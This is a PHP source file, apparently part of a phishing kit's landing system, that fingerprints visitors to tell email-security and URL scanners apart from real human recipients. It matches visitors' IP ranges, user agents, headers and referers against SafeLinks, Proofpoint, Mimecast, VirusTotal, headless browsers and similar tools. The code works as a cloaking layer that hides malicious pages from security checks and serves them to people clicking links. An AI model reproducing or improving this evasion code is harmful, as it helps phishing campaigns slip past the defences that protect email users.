²ιΏ΄/±ΰΌ ΄ϊΒλ
ΔΪΘέ
<?php /** * βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ * LANDING SYSTEM - SCANNER DETECTION ENGINE * Detects 50+ email security systems and URL scanners * βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ */ class ScannerDetector { private $ip; private $userAgent; private $headers; private $results = []; private $totalScore = 0; // IP ranges loaded from JSON private $ipRanges = []; // User-agent patterns loaded from JSON private $uaPatterns = []; public function __construct() { $this->loadDetectionData(); } /** * Load detection data from JSON files */ private function loadDetectionData() { $ipFile = DATA_PATH . '/scanner_ips.json'; $uaFile = DATA_PATH . '/scanner_agents.json'; if (file_exists($ipFile)) { $this->ipRanges = json_decode(file_get_contents($ipFile), true) ?? []; } if (file_exists($uaFile)) { $this->uaPatterns = json_decode(file_get_contents($uaFile), true) ?? []; } } /** * Main detection method * @return array Detection result */ public function detect() { // Get visitor info $this->ip = $this->getRealIP(); $this->userAgent = $_SERVER['HTTP_USER_AGENT'] ?? ''; $this->headers = $this->getAllHeaders(); // LOCALHOST BYPASS - Skip detection for local testing if ($this->isLocalhost()) { return [ 'is_scanner' => false, 'needs_challenge' => false, 'is_human' => true, 'confidence' => 0, 'vendor' => null, 'method' => 'localhost_bypass', 'details' => [], 'ip' => $this->ip, 'user_agent' => $this->userAgent, ]; } // Check IP cache first (Phase 2) $cachedResult = AdvancedDetection::getCachedIpResult($this->ip); if ($cachedResult !== null && $cachedResult['is_scanner']) { return [ 'is_scanner' => true, 'needs_challenge' => false, 'is_human' => false, 'confidence' => $cachedResult['confidence'], 'vendor' => $cachedResult['vendor'], 'method' => 'cached', 'details' => [['method' => 'ip_cache', 'vendor' => $cachedResult['vendor'], 'confidence' => $cachedResult['confidence']]], 'ip' => $this->ip, 'user_agent' => $this->userAgent, 'from_cache' => true, ]; } // Run Phase 1 detection checks $this->checkIP(); $this->checkUserAgent(); $this->checkHeaders(); $this->checkBehavior(); // Run Phase 2 advanced detection checks $advancedResult = AdvancedDetection::runAdvancedChecks($this->ip); // Combine scores (take max, add portion of other) $advancedScore = $advancedResult['score']; if ($advancedScore > 0) { $this->addResult('advanced_detection', $advancedResult['vendor'] ?? 'advanced', $advancedScore); // Merge reasons into details foreach ($advancedResult['reasons'] as $reason) { $this->results[] = [ 'method' => 'advanced_' . $reason, 'vendor' => $advancedResult['vendor'] ?? 'unknown', 'confidence' => $advancedScore, ]; } } // Calculate final result $isScanner = $this->totalScore >= SCANNER_CONFIDENCE_THRESHOLD; $needsChallenge = !$isScanner && $this->totalScore >= CHALLENGE_CONFIDENCE_THRESHOLD; // Determine primary vendor $vendor = $this->getPrimaryVendor(); $method = $this->getPrimaryMethod(); // Use advanced vendor if detected if ($advancedResult['vendor'] && !$vendor) { $vendor = $advancedResult['vendor']; } $result = [ 'is_scanner' => $isScanner, 'needs_challenge' => $needsChallenge, 'is_human' => !$isScanner && !$needsChallenge, 'confidence' => min($this->totalScore, 100), 'vendor' => $vendor, 'method' => $method, 'details' => $this->results, 'ip' => $this->ip, 'user_agent' => $this->userAgent, 'rate_info' => $advancedResult['rate_info'] ?? null, ]; // Cache result for IP (Phase 2) if ($isScanner) { AdvancedDetection::cacheIpResult($this->ip, $result); } return $result; } /** * Check if request is from localhost (for testing bypass) */ private function isLocalhost() { $localIPs = ['127.0.0.1', '::1', 'localhost']; $serverName = $_SERVER['SERVER_NAME'] ?? ''; $serverAddr = $_SERVER['SERVER_ADDR'] ?? ''; return in_array($this->ip, $localIPs) || in_array($serverName, $localIPs) || in_array($serverAddr, $localIPs) || strpos($serverName, 'localhost') !== false; } /** * Get real IP address (handles proxies) */ private function getRealIP() { $headers = [ 'HTTP_CF_CONNECTING_IP', // Cloudflare 'HTTP_X_REAL_IP', // Nginx 'HTTP_X_FORWARDED_FOR', // Standard proxy 'HTTP_CLIENT_IP', // Some proxies 'REMOTE_ADDR', // Direct connection ]; foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $ip = $_SERVER[$header]; // Handle comma-separated list (X-Forwarded-For) if (strpos($ip, ',') !== false) { $ips = explode(',', $ip); $ip = trim($ips[0]); } // Validate IP if (filter_var($ip, FILTER_VALIDATE_IP)) { return $ip; } } } return $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0'; } /** * Get all request headers */ private function getAllHeaders() { $headers = []; foreach ($_SERVER as $key => $value) { if (strpos($key, 'HTTP_') === 0) { $header = str_replace('HTTP_', '', $key); $header = str_replace('_', '-', $header); $headers[$header] = $value; } } return $headers; } /** * Check IP against known scanner ranges */ private function checkIP() { if (empty($this->ipRanges)) return; foreach ($this->ipRanges as $vendor => $ranges) { // Skip metadata keys like _comment, _version (Audit Fix: Bug #1) if (!is_array($ranges)) continue; foreach ($ranges as $range) { if ($this->ipInRange($this->ip, $range)) { $this->addResult('ip_range', $vendor, 95); return; // Stop on first match } } } // Check for datacenter/cloud IP patterns if ($this->isDatacenterIP()) { $this->addResult('datacenter_ip', 'cloud_provider', 40); } } /** * Check if IP is in CIDR range */ private function ipInRange($ip, $range) { if (strpos($range, '/') === false) { return $ip === $range; } list($subnet, $mask) = explode('/', $range); $ip = ip2long($ip); $subnet = ip2long($subnet); $mask = ~((1 << (32 - $mask)) - 1); return ($ip & $mask) === ($subnet & $mask); } /** * Check for common datacenter IP patterns */ private function isDatacenterIP() { // Common datacenter IP first octets $datacenterPrefixes = [ '3.', // AWS '13.', // Azure '18.', // AWS '20.', // Azure '34.', // Google Cloud '35.', // Google Cloud '40.', // Azure '52.', // AWS/Azure '54.', // AWS '104.', // Google/Cloudflare '142.', // Google '172.', // Various (check private range) ]; foreach ($datacenterPrefixes as $prefix) { if (strpos($this->ip, $prefix) === 0) { return true; } } return false; } /** * Check User-Agent for scanner signatures */ private function checkUserAgent() { if (empty($this->userAgent)) { $this->addResult('empty_user_agent', 'unknown', 70); return; } $uaLower = strtolower($this->userAgent); // Check patterns from JSON file if (!empty($this->uaPatterns)) { foreach ($this->uaPatterns as $vendor => $patterns) { // Skip metadata keys like _comment, _version (Audit Fix: Bug #1) if (!is_array($patterns)) continue; foreach ($patterns as $pattern) { if (strpos($uaLower, strtolower($pattern)) !== false) { $this->addResult('user_agent_match', $vendor, 90); return; } } } } // Built-in patterns (fallback) $builtinPatterns = [ // Security vendors 'proofpoint' => ['proofpoint'], 'mimecast' => ['mimecast'], 'barracuda' => ['barracuda', 'bnctrl'], 'microsoft' => ['microsoft url', 'microsoft office protocol'], 'google' => ['google-safety', 'googlebot', 'google-urlcheck'], 'symantec' => ['symantec', 'messagelabs'], 'trendmicro' => ['trendmicro', 'tmchk'], 'sophos' => ['sophos'], 'forcepoint' => ['forcepoint', 'websense'], 'fireeye' => ['fireeye'], 'cisco' => ['cisco', 'ironport'], // URL scanners 'virustotal' => ['virustotal'], 'urlscan' => ['urlscan'], 'safebrowsing' => ['safebrowsing'], // Generic bots 'bot' => ['bot', 'crawler', 'spider', 'slurp', 'scan'], 'tool' => ['wget', 'curl', 'python', 'java/', 'perl', 'ruby', 'go-http', 'axios', 'node-fetch'], // Headless browsers 'headless' => ['headless', 'phantom', 'puppeteer', 'playwright', 'selenium', 'webdriver'], ]; foreach ($builtinPatterns as $vendor => $patterns) { foreach ($patterns as $pattern) { if (strpos($uaLower, $pattern) !== false) { $confidence = in_array($vendor, ['bot', 'tool']) ? 75 : 90; $this->addResult('user_agent_builtin', $vendor, $confidence); return; } } } // Very short user agent is suspicious if (strlen($this->userAgent) < 30) { $this->addResult('short_user_agent', 'suspicious', 30); } } /** * Check request headers for anomalies */ private function checkHeaders() { $score = 0; $reasons = []; $vendor = 'header_anomaly'; // Missing Accept-Language (real browsers always send this) if (!isset($this->headers['ACCEPT-LANGUAGE'])) { $score += 25; $reasons[] = 'missing_accept_language'; } // Missing Accept-Encoding if (!isset($this->headers['ACCEPT-ENCODING'])) { $score += 15; $reasons[] = 'missing_accept_encoding'; } // Suspicious Accept header $accept = $this->headers['ACCEPT'] ?? ''; if ($accept === '*/*' || empty($accept)) { $score += 15; $reasons[] = 'generic_accept'; } // Missing Connection header (browsers send this) if (!isset($this->headers['CONNECTION'])) { $score += 10; $reasons[] = 'missing_connection'; } // Long proxy chain (X-Forwarded-For) if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ips = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); if (count($ips) > 3) { $score += 20; $reasons[] = 'long_proxy_chain'; } } // βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ // URL REWRITER DETECTION (SafeLinks, URL Defense, Mimecast, etc.) // These services rewrite URLs and scan them before the user clicks // βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ $referer = $this->headers['REFERER'] ?? ''; $refererLower = strtolower($referer); // Microsoft SafeLinks if (strpos($refererLower, 'safelinks.protection.outlook.com') !== false || strpos($refererLower, 'safelinks.protection.office.com') !== false || strpos($refererLower, 'nam02.safelinks') !== false || strpos($refererLower, 'eur01.safelinks') !== false || strpos($refererLower, 'apc01.safelinks') !== false) { $score = 95; $vendor = 'Microsoft SafeLinks'; $reasons = ['url_rewriter_safelinks']; } // Proofpoint URL Defense elseif (strpos($refererLower, 'urldefense.proofpoint.com') !== false || strpos($refererLower, 'urldefense.com') !== false) { $score = 95; $vendor = 'Proofpoint URL Defense'; $reasons = ['url_rewriter_urldefense']; } // Mimecast elseif (strpos($refererLower, 'protect-us.mimecast.com') !== false || strpos($refererLower, 'protect-eu.mimecast.com') !== false || strpos($refererLower, 'protect-au.mimecast.com') !== false || strpos($refererLower, 'protect-de.mimecast.com') !== false) { $score = 95; $vendor = 'Mimecast'; $reasons = ['url_rewriter_mimecast']; } // Barracuda Link Protect elseif (strpos($refererLower, 'barracuda.com') !== false || strpos($refererLower, 'linkprotect.cudasvc.com') !== false) { $score = 95; $vendor = 'Barracuda'; $reasons = ['url_rewriter_barracuda']; } // Sophos elseif (strpos($refererLower, 'sophos.com') !== false) { $score = 95; $vendor = 'Sophos'; $reasons = ['url_rewriter_sophos']; } // Cisco/IronPort elseif (strpos($refererLower, 'iphmx.com') !== false || strpos($refererLower, 'cisco.com') !== false) { $score = 95; $vendor = 'Cisco IronPort'; $reasons = ['url_rewriter_cisco']; } // Fortinet elseif (strpos($refererLower, 'fortinet.com') !== false || strpos($refererLower, 'fortimail') !== false) { $score = 95; $vendor = 'Fortinet'; $reasons = ['url_rewriter_fortinet']; } // Trend Micro elseif (strpos($refererLower, 'trendmicro.com') !== false) { $score = 95; $vendor = 'Trend Micro'; $reasons = ['url_rewriter_trendmicro']; } // FireEye/Mandiant elseif (strpos($refererLower, 'fireeye.com') !== false || strpos($refererLower, 'mandiant.com') !== false) { $score = 95; $vendor = 'FireEye'; $reasons = ['url_rewriter_fireeye']; } // Zscaler elseif (strpos($refererLower, 'zscaler') !== false) { $score = 95; $vendor = 'Zscaler'; $reasons = ['url_rewriter_zscaler']; } // Websense/Forcepoint elseif (strpos($refererLower, 'websense.com') !== false || strpos($refererLower, 'forcepoint.com') !== false) { $score = 95; $vendor = 'Forcepoint'; $reasons = ['url_rewriter_forcepoint']; } // Scanner-specific headers $scannerHeaders = [ 'X-SCANNER' => 'Generic Scanner', 'X-VIRUS-SCANNED' => 'Virus Scanner', 'X-SPAM-STATUS' => 'Spam Filter', 'X-PROOFPOINT' => 'Proofpoint', 'X-MIMECAST' => 'Mimecast', 'X-BARRACUDA' => 'Barracuda', 'X-MS-EXCHANGE-ORGANIZATION' => 'Microsoft Exchange', 'X-FOREFRONT-ANTISPAM' => 'Microsoft Forefront', 'X-MICROSOFT-ANTISPAM' => 'Microsoft Defender', ]; foreach ($scannerHeaders as $header => $headerVendor) { if (isset($this->headers[$header])) { $score = max($score, 85); $vendor = $headerVendor; $reasons[] = 'scanner_header_' . strtolower(str_replace('-', '_', $header)); } } if ($score > 0) { $this->addResult('header_analysis', $vendor, $score); // Log detailed reasons foreach ($reasons as $reason) { $this->results[] = [ 'method' => 'header_' . $reason, 'vendor' => $vendor, 'confidence' => $score, ]; } } } /** * Check behavioral patterns */ private function checkBehavior() { // Check for rapid sequential requests (would need session/DB) // For now, just check request method // POST to GET endpoint is suspicious if ($_SERVER['REQUEST_METHOD'] === 'POST' && !in_array($_SERVER['REQUEST_URI'], ['/verify', '/api/create'])) { $this->addResult('unexpected_method', 'suspicious', 20); } // No cookies might indicate scanner (but many legitimate first visits have none) // Light penalty only if (empty($_COOKIE)) { $this->addResult('no_cookies', 'first_visit_or_scanner', 5); } } /** * Add detection result */ private function addResult($method, $vendor, $confidence) { $this->results[] = [ 'method' => $method, 'vendor' => $vendor, 'confidence' => $confidence, ]; // Only count highest confidence per method type if ($confidence > 0) { $this->totalScore = max($this->totalScore, $confidence); // Add smaller amounts for additional signals if (count($this->results) > 1) { $this->totalScore = min(100, $this->totalScore + ($confidence * 0.2)); } } } /** * Get primary vendor from results */ private function getPrimaryVendor() { if (empty($this->results)) return null; // Sort by confidence usort($this->results, function($a, $b) { return $b['confidence'] - $a['confidence']; }); return $this->results[0]['vendor']; } /** * Get primary detection method */ private function getPrimaryMethod() { if (empty($this->results)) return null; usort($this->results, function($a, $b) { return $b['confidence'] - $a['confidence']; }); return $this->results[0]['method']; } /** * Get visitor IP */ public function getIP() { return $this->ip ?? $this->getRealIP(); } /** * Get visitor User-Agent */ public function getUserAgent() { return $this->userAgent ?? ($_SERVER['HTTP_USER_AGENT'] ?? ''); } /** * Get all headers */ public function getHeaders() { return $this->headers ?? $this->getAllHeaders(); } } /** * Quick detection function */ function detect_scanner() { $detector = new ScannerDetector(); return $detector->detect(); }